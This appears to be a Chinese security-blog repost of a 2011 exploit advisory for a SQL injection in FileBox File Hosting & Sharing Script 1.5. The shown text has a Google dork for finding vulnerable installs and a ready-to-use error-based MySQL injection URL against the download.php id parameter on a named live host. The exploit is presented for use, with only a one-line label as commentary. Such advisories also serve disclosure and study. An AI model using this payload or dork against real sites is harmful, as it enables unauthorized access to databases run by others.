FileBox – File Hosting & Sharing Script v 1.5 SQL注入漏洞

作者：hack1990 时间：11-09-02 阅读数：817人阅读

# Exploit Title: FileBox - File Hosting & Sharing Script 1.5 SQL Injection

# Google Dork: inurl:FileBox

# Date: 30/08/2011

# Author: Scripts Apart

# Software Link: http://www.scriptsapart.com

# Version: 1.5

# Tested on: Windows 7 , Ubuntu 11

# CVE :

# Exploit Discovered : SubhashDasyam

# Website : http://www.subhashdasyam.com

http://blog.x1x2.info/download.php?id=%20and(select%201%20from(select%20count(*),concat((select%20(select%200x53514c20417661696c61626c65206279205375626861736844617379616d)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1

这是MYSQL_Error sqli基础

# Nmap Security Scanner 7.0

上一篇：迅捷网络留言本(原多多留言本) v 1.1 GBK注入漏洞及后台拿WebShell

下一篇：利用JS本地加密防止嗅探

FileBox – File Hosting & Sharing Script v 1.5 SQL注入漏洞

相关文章

发表评论